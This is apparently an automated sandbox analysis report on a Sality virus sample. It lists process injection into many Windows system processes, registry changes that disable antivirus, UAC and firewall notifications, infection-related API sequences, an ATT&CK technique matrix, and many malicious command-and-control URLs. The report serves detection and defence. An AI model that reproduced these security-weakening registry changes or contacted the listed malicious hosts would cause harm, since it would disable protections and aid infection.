        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dwm.exe base: 970000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\sihost.exe base: B40000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 990000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: A20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ctfmon.exe base: AD0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\explorer.exe base: 3430000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: DC0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: BD0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 190000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: B10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B30000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\smartscreen.exe base: 310000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 600000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 450000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 980000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 200000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 210000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: A70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dllhost.exe base: A90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: C80000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 3A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: 780000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 3E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 670000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: DC0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 8C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dwm.exe base: 980000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\sihost.exe base: B50000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 9A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: A30000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ctfmon.exe base: AE0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\explorer.exe base: 3450000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: DD0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: BE0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: B20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B40000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\smartscreen.exe base: 320000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 610000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 460000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 990000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 210000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: AA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 220000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: FA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: A80000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dllhost.exe base: AA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: C90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 3B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: BA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: 790000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 3F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 680000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: DD0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 8D0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dwm.exe base: 990000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\sihost.exe base: B60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 9B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: A40000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ctfmon.exe base: AF0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\explorer.exe base: 3460000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: DE0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: BF0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: B30000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B50000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\smartscreen.exe base: 330000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 620000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 470000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 220000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: AB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 230000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: FB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: A90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dllhost.exe base: AB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: CA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 3C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: BB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: 7A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 400000Jump to behavior
        Source: dwm.exe, 00000005.00000000.1718963410.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
        Source: dwm.exe, 00000005.00000000.1719666848.000002BAA8051000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000008.00000000.1820211348.000001CD41221000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000009.00000000.1859358247.00000151A5061000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: dwm.exe, 00000005.00000000.1719666848.000002BAA8051000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000008.00000000.1820211348.000001CD41221000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000009.00000000.1859358247.00000151A5061000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: explorer.exe, 0000000D.00000002.4185243812.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1880009773.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
        Source: dwm.exe, 00000005.00000000.1719666848.000002BAA8051000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000008.00000000.1820211348.000001CD41221000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000009.00000000.1859358247.00000151A5061000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: dwm.exe, 00000005.00000000.1719666848.000002BAA8051000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000008.00000000.1820211348.000001CD41221000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000009.00000000.1859358247.00000151A5061000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00903062 Sleep,Sleep,Sleep,GetLogicalDrives,GetDriveTypeA,lstrcat,CreateFileA,GetFileTime,FileTimeToSystemTime,ReadFile,CharLowerA,lstrlen,lstrcpy,GetFileAttributesA,CloseHandle,CreateFileA,WriteFile,CloseHandle,SetFileAttributesA,CloseHandle,GetFileAttributesA,SetFileAttributesA,DeleteFileA,CreateFileA,GetSystemTime,SystemTimeToFileTime,lstrcat,lstrcat,lstrlen,WriteFile,SetFileTime,CloseHandle,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,SetFileAttributesA,Sleep,RtlExitUserThread,0_2_00903062
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00903B60 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,lstrcpy,lstrcat,RegOpenKeyExA,GetModuleFileNameA,wsprintfA,lstrlen,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,GetWindowsDirectoryA,lstrlen,lstrcat,GetComputerNameA,lstrlen,lstrlen,lstrcpy,GetUserNameA,lstrlen,lstrcpy,lstrlen,lstrlen,GetTempPathA,lstrlen,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrlen,lstrcat,CreateFileMappingA,lstrlen,GetTickCount,wsprintfA,lstrlen,wsprintfA,lstrcat,GetSystemDirectoryA,lstrlen,lstrcat,lstrcat,lstrcat,GlobalAlloc,GlobalAlloc,0_2_00903B60
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00901EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,CloseHandle,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,0_2_00901EF6

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center AntiVirusOverrideJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeRegistry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot AlternateShellJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security CenterJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile DisableNotificationsJump to behavior
        Source: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfileRegistry value created: DisableNotifications 1Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_008F7A3A htons,socket,setsockopt,bind,GlobalAlloc,recvfrom,CreateThread,GlobalFree,closesocket,RtlExitUserThread,0_2_008F7A3A
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_008F83C9 socket,htons,bind,listen,accept,CreateThread,closesocket,RtlExitUserThread,0_2_008F83C9
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire Infrastructure12
        Replication Through Removable Media
        2
        Native API
        1
        DLL Side-Loading
        1
        Abuse Elevation Control Mechanism
        6
        Disable or Modify Tools
        1
        Credential API Hooking
        1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        2
        Ingress Tool Transfer
        Exfiltration Over Other Network Medium1
        Inhibit System Recovery
        CredentialsDomainsDefault Accounts2
        Command and Scripting Interpreter
        1
        Windows Service
        1
        DLL Side-Loading
        1
        Abuse Elevation Control Mechanism
        LSASS Memory11
        Peripheral Device Discovery
        Remote Desktop Protocol1
        Credential API Hooking
        1
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Bypass User Account Control
        2
        Obfuscated Files or Information
        Security Account Manager1
        Account Discovery
        SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Standard Port
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        Access Token Manipulation
        3
        Software Packing
        NTDS4
        File and Directory Discovery
        Distributed Component Object ModelInput Capture1
        Non-Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
        Windows Service
        1
        DLL Side-Loading
        LSA Secrets13
        System Information Discovery
        SSHKeylogging11
        Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts52
        Process Injection
        1
        Bypass User Account Control
        Cached Domain Credentials111
        Security Software Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        File Deletion
        DCSync21
        Virtualization/Sandbox Evasion
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
        Masquerading
        Proc Filesystem3
        Process Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
        Virtualization/Sandbox Evasion
        /etc/passwd and /etc/shadow1
        Application Window Discovery
        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
        Access Token Manipulation
        Network Sniffing1
        System Owner/User Discovery
        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd52
        Process Injection
        Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        RHxJqGoGFB.exe95%ReversingLabsWin32.Virus.Sality
        RHxJqGoGFB.exe100%AviraW32/Sality.AT
        RHxJqGoGFB.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\odnhm.exe100%AviraW32/Sality.AT
        C:\clmaq.pif100%AviraW32/Sality.AT
        C:\Users\user\AppData\Local\Temp\rkuso.exe100%AviraW32/Sality.AT
        C:\Users\user\AppData\Local\Temp\odnhm.exe100%Joe Sandbox ML
        C:\clmaq.pif100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\rkuso.exe100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://46.105.103.219/sobakavolos.gif?53792577=-1494070546100%Avira URL Cloudmalware
        http://46.105.103.219/sobakavolos.gif?10c254e3=1687027026100%Avira URL Cloudmalware
        http://slwocfd/sobaka1.gif?a5cbf448=-7353409200%Avira URL Cloudsafe
        http://slwocfd/sobaka1.gif?564061b2=1493272264p0%Avira URL Cloudsafe
        http://46.105.103.219/sobakavolos.gif?16620ca3=1502098060100%Avira URL Cloudmalware
        http://46.105.103.219/sobakavolos.gif?1a7967a=83280750100%Avira URL Cloudmalware
        http://46.105.103.219/sobakavolos.gif?d0255c4e=-1325038046100%Avira URL Cloudmalware
        http://46.105.103.219/sobakavolos.gif?247d6b5=76524906100%Avira URL Cloudmalware
        http://46.105.103.219/sobakavolos.gif?b40fdb1=566425875100%Avira URL Cloudmalware
        http://46.105.103.219/sobakavolos.gif?8756340a=-1778213858100%Avira URL Cloudmalware
        http://46.105.103.219/sobakavolos.gif?c1fee9b0=267865472100%Avira URL Cloudmalware
        http://46.105.103.219/sobakavolos.gif?ee5adceb=1926686552100%Avira URL Cloudmalware
        http://46.105.103.219/sobakavolos.gif?b4156853=1747636390d100%Avira URL Cloudmalware
        http://46.105.103.219/sobakak0%Avira URL Cloudsafe
        http://46.105.103.219/sobakavolos.gif?d7244def=-503438967100%Avira URL Cloudmalware
        http://slwocfd/sobaka1.gif?f017666e=18928501420%Avira URL Cloudsafe
        http://46.105.103.219/sobakavolos.gif?590aff39=-1307181454100%Avira URL Cloudmalware
        http://46.105.103.219/sobakavolos.gif?aea19a18=1564685360100%Avira URL Cloudmalware
        http://46.105.103.219/sobakavolos.gif?387ee8e=177720234100%Avira URL Cloudmalware
        http://46.105.103.219/sobakavolos.gif?4c8fe82=722530962C$100%Avira URL Cloudmalware
        http://slwocfd/sobaka1.gif?52e81f=54333750%Avira URL Cloudsafe
        http://slwocfd/sobaka1.gif?8a6244f0=-19732713120%Avira URL Cloudsafe
        http://46.105.103.219/sobakavolos.gif?a74235ca=-343063876100%Avira URL Cloudmalware
        http://slwocfd/sobaka1.gif?e14e2c8c=-15449114520%Avira URL Cloudsafe
        http://46.105.103.219/sobakavolos.gif?d42c48fe=-1470590468100%Avira URL Cloudmalware
        http://slwocfd/sobaka1.gif?7f4bf891=2088491733L0%Avira URL Cloudsafe
        http://slwocfd/sobaka1.gif?8ffc239e=-1342936358R0%Avira URL Cloudsafe
        http://kukutrustnet987.info/home.gif100%Avira URL Cloudmalware
        http://slwocfd/sobaka1.gif?afe2fd9b=-1081346452V0%Avira URL Cloudsafe
        http://slwocfd/sobaka1.gif?b2218d7f=-930728452.0%Avira URL Cloudsafe
        http://slwocfd/sobaka1.gif?8ffc239e=-13429363580%Avira URL Cloudsafe
        http://46.105.103.219/sobakavolos.gif?2e864a2=146353638c100%Avira URL Cloudmalware
        http://46.105.103.219/sobakavolos.gif?c535894d=349578548100%Avira URL Cloudmalware
        https://powerpoint.office.comxee0%Avira URL Cloudsafe
        http://slwocfd/sobaka1.gif?d2293919=899431162Ge0%Avira URL Cloudsafe
        https://rafd.https://r.a0%Avira URL Cloudsafe
        http://46.105.103.219/sobakavolos.gif?e7c0a656=226918236100%Avira URL Cloudmalware
        http://46.105.103.219/sobakavolos.gif?7ccb59f9=1986137579100%Avira URL Cloudmalware
        http://46.105.103.219/sobakavolos.gif?55ce57c=359896560p$W100%Avira URL Cloudmalware
        http://slwocfd/sobaka1.gif?d53ab8af=21422515330%Avira URL Cloudsafe
        http://46.105.103.219/sobakavolos.gif?aea19a18=1564685360z100%Avira URL Cloudmalware
        http://kukutrustnet777888.info/DisableTaskMgrSoftware100%Avira URL Cloudphishing
        http://46.105.103.219/sobakavolos.gif?eaf3a57c=-2118786840100%Avira URL Cloudmalware
        http://slwocfd/sobaka1.gif?5d4ae9a2=15651905620%Avira URL Cloudsafe
        http://slwocfd/sobaka1.gifhttp://46.105.103.219/sobakavolos.gifK0%Avira URL Cloudsafe
        http://slwocfd/sobaka1.gif?aba116d6=-13186089340%Avira URL Cloudsafe
        http://slwocfd/sobaka1.gif?850adac5=1691948900%Avira URL Cloudsafe
        https://raka.rms_noco-VK0%Avira URL Cloudsafe
        http://46.105.103.219/sobakavolos.gif?7e81b91=530607684100%Avira URL Cloudmalware
        http://slwocfd/sobaka1.gif?e6095c35=-8711883740%Avira URL Cloudsafe
        http://slwocfd/sobaka1.gif?d9476d1b=2093630222Te&0%Avira URL Cloudsafe
        http://slwocfd/sobaka1.gif?d2293919=899431162Je0%Avira URL Cloudsafe
        http://slwocfd/sobaka1.gif?c4094dae=-14702979080%Avira URL Cloudsafe
        No contacted domains info
        NameMaliciousAntivirus DetectionReputation
        http://46.105.103.219/sobakavolos.gif?16620ca3=1502098060true
        • Avira URL Cloud: malware
        unknown
        http://46.105.103.219/sobakavolos.gif?53792577=-1494070546true
        • Avira URL Cloud: malware
        unknown
        http://46.105.103.219/sobakavolos.gif?8756340a=-1778213858true
        • Avira URL Cloud: malware
        unknown
        http://46.105.103.219/sobakavolos.gif?1a7967a=83280750true
        • Avira URL Cloud: malware
        unknown
        http://46.105.103.219/sobakavolos.gif?b40fdb1=566425875true
        • Avira URL Cloud: malware
        unknown
        http://46.105.103.219/sobakavolos.gif?10c254e3=1687027026true
        • Avira URL Cloud: malware
        unknown
        http://46.105.103.219/sobakavolos.gif?247d6b5=76524906true
        • Avira URL Cloud: malware
        unknown
        http://46.105.103.219/sobakavolos.gif?d0255c4e=-1325038046true
        • Avira URL Cloud: malware
        unknown
        http://46.105.103.219/sobakavolos.gif?ee5adceb=1926686552true
        • Avira URL Cloud: malware
        unknown
        http://46.105.103.219/sobakavolos.gif?c1fee9b0=267865472true
        • Avira URL Cloud: malware
        unknown
        http://46.105.103.219/sobakavolos.gif?590aff39=-1307181454true
        • Avira URL Cloud: malware
        unknown
        http://46.105.103.219/sobakavolos.gif?d7244def=-503438967true
        • Avira URL Cloud: malware
        unknown
        http://46.105.103.219/sobakavolos.gif?aea19a18=1564685360true
        • Avira URL Cloud: malware
        unknown
        http://46.105.103.219/sobakavolos.gif?387ee8e=177720234true
        • Avira URL Cloud: malware
        unknown
        http://46.105.103.219/sobakavolos.gif?a74235ca=-343063876true
        • Avira URL Cloud: malware
        unknown
        http://46.105.103.219/sobakavolos.gif?d42c48fe=-1470590468true
